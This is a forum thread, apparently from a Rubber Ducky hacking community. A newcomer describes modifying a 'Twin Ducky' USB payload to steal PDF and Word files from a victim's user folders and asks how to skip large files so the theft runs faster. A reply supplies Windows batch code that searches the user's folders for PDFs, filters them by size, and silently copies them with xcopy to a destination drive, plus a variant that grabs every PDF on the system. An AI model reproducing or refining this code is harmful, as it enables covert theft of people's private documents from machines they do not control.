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Hello Guys. I'm new in this community so nice to meet you! I'm very happy to write finally on this forum I've been reading for a while by now.

I finally managed to built my Twin Ducky able to steal targeted files, following the lasts episodes of DK (2112-2113-2114)

So of course I started  enjoying to play with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE% . 


Now, I wanted to go even further by making the process even faster. I thought the duration variable of the exfiltration process depends on the size of the pdf/doc/whatever document  which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of let's say 10-15 MB.. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm not native English neither experienced in pentesting like you guys, so.. in that case forgive me.

Let me know :)
Have a nice day!

Posted (edited)

Hi Sinkinson,

I don't know if it would be any fast but you could give it a go.

Test code:

SET maxsize=10485760
FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO (
IF %%~zA LSS %maxsize% (
ECHO %%A is LESS at %%~zA
) ELSE (
ECHO %%A is MORE at %%~zA

Code below untested

Too copy file less then 10MB:

SET maxsize=10485760
FOR /F "delims==" %%A IN ('dir %USERPROFILE%\Documents\ /s /b ^| find /i ".pdf"') DO (
IF %%~zA LSS %maxsize% (
xcopy /C /Q /G /Y /S %%A %dst% >>nul

To copy all pdf on the system (but you will most like run in to issue with privileges):

SET maxsize=10485760
FOR /R %%I in (*.pdf) do IF %%~zI LSS %maxsize% (
xcopy /C /Q /G /Y /S %%I %dst% >>nul

Maxsize is in bytes

Have not tested in on a duck as my ducky has not got the twin duck firmware on it.
so you may need to changes some bit to get it to work

Hope this helps

Edited by Cribbit

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